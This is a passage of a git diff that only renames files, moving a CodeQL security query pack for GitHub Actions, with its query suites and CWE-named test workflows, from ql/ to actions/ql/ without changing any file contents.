b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutCritical.md rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutHigh.md rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutMedium.md rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md similarity index 100% rename from ql/src/Security/CWE-829/UnversionedImmutableAction.md rename to actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql similarity index 100% rename from ql/src/Security/CWE-829/UnversionedImmutableAction.ql rename to actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/actions/ql/src/Security/CWE-918/RequestForgery.ql similarity index 100% rename from ql/src/Security/CWE-918/RequestForgery.ql rename to actions/ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md similarity index 100% rename from ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md rename to actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql similarity index 100% rename from ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql rename to actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql diff --git a/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml similarity index 100% rename from ql/src/codeql-pack.lock.yml rename to actions/ql/src/codeql-pack.lock.yml diff --git a/ql/src/codeql-suites/actions-all.qls b/actions/ql/src/codeql-suites/actions-all.qls similarity index 100% rename from ql/src/codeql-suites/actions-all.qls rename to actions/ql/src/codeql-suites/actions-all.qls diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/actions/ql/src/codeql-suites/actions-bughalla.qls similarity index 100% rename from ql/src/codeql-suites/actions-bughalla.qls rename to actions/ql/src/codeql-suites/actions-bughalla.qls diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/actions/ql/src/codeql-suites/actions-code-scanning.qls similarity index 100% rename from ql/src/codeql-suites/actions-code-scanning.qls rename to actions/ql/src/codeql-suites/actions-code-scanning.qls diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/actions/ql/src/codeql-suites/actions-security-and-quality.qls similarity index 100% rename from ql/src/codeql-suites/actions-security-and-quality.qls rename to actions/ql/src/codeql-suites/actions-security-and-quality.qls diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/actions/ql/src/codeql-suites/actions-summaries-queries.qls similarity index 100% rename from ql/src/codeql-suites/actions-summaries-queries.qls rename to actions/ql/src/codeql-suites/actions-summaries-queries.qls diff --git a/ql/src/qlpack.yml b/actions/ql/src/qlpack.yml similarity index 100% rename from ql/src/qlpack.yml rename to actions/ql/src/qlpack.yml diff --git a/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml similarity index 100% rename from ql/test/codeql-pack.lock.yml rename to actions/ql/test/codeql-pack.lock.yml diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/actions/ql/test/library-tests/.github/workflows/commands.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/commands.yml rename to actions/ql/test/library-tests/.github/workflows/commands.yml diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/expression_nodes.yml rename to actions/ql/test/library-tests/.github/workflows/expression_nodes.yml diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/actions/ql/test/library-tests/.github/workflows/multiline.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/multiline.yml rename to actions/ql/test/library-tests/.github/workflows/multiline.yml diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/actions/ql/test/library-tests/.github/workflows/multiline2.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/multiline2.yml rename to actions/ql/test/library-tests/.github/workflows/multiline2.yml diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/actions/ql/test/library-tests/.github/workflows/poisonable_steps.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/poisonable_steps.yml rename to actions/ql/test/library-tests/.github/workflows/poisonable_steps.yml diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/actions/ql/test/library-tests/.github/workflows/shell.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/shell.yml rename to actions/ql/test/library-tests/.github/workflows/shell.yml diff --git a/ql/test/library-tests/.github/workflows/test.yml b/actions/ql/test/library-tests/.github/workflows/test.yml similarity index 100% rename from ql/test/library-tests/.github/workflows/test.yml rename to actions/ql/test/library-tests/.github/workflows/test.yml diff --git a/ql/test/library-tests/commands.expected b/actions/ql/test/library-tests/commands.expected similarity index 100% rename from ql/test/library-tests/commands.expected rename to actions/ql/test/library-tests/commands.expected diff --git a/ql/test/library-tests/commands.ql b/actions/ql/test/library-tests/commands.ql similarity index 100% rename from ql/test/library-tests/commands.ql rename to actions/ql/test/library-tests/commands.ql diff --git a/ql/test/library-tests/poisonable_steps.expected b/actions/ql/test/library-tests/poisonable_steps.expected similarity index 100% rename from ql/test/library-tests/poisonable_steps.expected rename to actions/ql/test/library-tests/poisonable_steps.expected diff --git a/ql/test/library-tests/poisonable_steps.ql b/actions/ql/test/library-tests/poisonable_steps.ql similarity index 100% rename from ql/test/library-tests/poisonable_steps.ql rename to actions/ql/test/library-tests/poisonable_steps.ql diff --git a/ql/test/library-tests/test.expected b/actions/ql/test/library-tests/test.expected similarity index 100% rename from ql/test/library-tests/test.expected rename to actions/ql/test/library-tests/test.expected diff --git a/ql/test/library-tests/test.ql b/actions/ql/test/library-tests/test.ql similarity index 100% rename from ql/test/library-tests/test.ql rename to actions/ql/test/library-tests/test.ql diff --git a/ql/test/library-tests/workflowenum.expected b/actions/ql/test/library-tests/workflowenum.expected similarity index 100% rename from ql/test/library-tests/workflowenum.expected rename to actions/ql/test/library-tests/workflowenum.expected diff --git a/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql similarity index 100% rename from ql/test/library-tests/workflowenum.ql rename to actions/ql/test/library-tests/workflowenum.ql diff --git a/ql/test/qlpack.yml b/actions/ql/test/qlpack.yml similarity index 100% rename from ql/test/qlpack.yml rename to actions/ql/test/qlpack.yml diff --git a/ql/test/query-tests/Models/.github/workflows/calling_composite.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml similarity index 100% rename from ql/test/query-tests/Models/.github/workflows/calling_composite.yml rename to actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml diff --git a/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/test/query-tests/Models/.github/workflows/calling_workflow.yml rename to actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml diff --git a/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml rename to actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSinks.expected rename to actions/ql/test/query-tests/Models/CompositeActionsSinks.expected diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSinks.qlref rename to actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSources.expected rename to actions/ql/test/query-tests/Models/CompositeActionsSources.expected diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSources.qlref rename to actions/ql/test/query-tests/Models/CompositeActionsSources.qlref diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSummaries.expected rename to actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Models/CompositeActionsSummaries.qlref rename to actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSinks.expected rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSources.expected rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSources.qlref rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref diff --git a/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml similarity index 100% rename from ql/test/query-tests/Models/action1/action.yml rename to actions/ql/test/query-tests/Models/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml rename to actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml rename to actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected rename to actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml rename to actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml rename to actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml rename to actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml rename to actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml diff --git 